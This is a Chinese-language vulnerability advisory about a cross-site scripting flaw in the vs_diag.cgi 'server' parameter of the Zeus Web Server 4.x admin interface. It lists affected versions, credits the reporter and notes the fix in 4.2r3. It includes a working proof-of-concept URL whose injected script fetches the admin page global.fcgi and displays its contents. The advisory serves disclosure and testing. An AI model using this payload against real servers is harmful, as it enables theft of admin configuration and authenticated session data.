Zeus Web Server Admin接口vs_diag.cgi跨站脚本执行漏洞
发布日期:2003-05-17
更新日期:2003-06-04
受影响系统:Zeus Technologies Zeus Web Server 4.2 r2
Zeus Technologies Zeus Web Server 4.2
Zeus Technologies Zeus Web Server 4.1 r5
Zeus Technologies Zeus Web Server 4.1 r4
Zeus Technologies Zeus Web Server 4.1 r3
Zeus Technologies Zeus Web Server 4.1 r2
Zeus Technologies Zeus Web Server 4.1 r1
Zeus Technologies Zeus Web Server 4.1
Zeus Technologies Zeus Web Server 4.0
描述:
BUGTRAQ ID:
7751
ZEUS是一款开放源代码的WEB服务程序,包含基于WEB的管理接口。
ZEUS WEB管理接口中vs_diag.cgi脚本对用户提交的参数确实正确的过滤,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户点击,导致恶意脚本在用户浏览器上执行。
问题是vs_diag.cgi脚本对server参数值缺少检查,攻击者可以提交任意值给此参数,包含恶意脚本代码。利用这个漏洞可以获得其他用户基于认证的Cookie敏感数据。
<*来源:Hugo "Vázquez" "Caramés" (
overclocking_a_la_abuela@hotmail.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=105427199423918&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Hugo "Vázquez" "Caramés" (
overclocking_a_la_abuela@hotmail.com)提供了如下测试方法:
http://<target>:9090/apps/web/vs_diag.cgi?server=<script>function%20pedo()
{var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open
("GET","http://<target>:9090/apps/web/global.fcgi",false);xmlHttp.send
();xmlDoc=xmlHttp.responseText;document.write(xmlDoc);}pedo();alert("Have%
20you%20enabled%20the%20protection%20of%20your%20ZEUS...?%20We%20can%20rip%
20this%20info!%20Much%20more%20evil%20actions%20are%20possible...")
</script>
建议:
厂商补丁:
Zeus Technologies
-----------------
Zeus 4.2r3不存在此漏洞,可从如下地址下载获得:
http://www.zeus.co.uk/浏览次数:6711
严重程度:0(网友投票)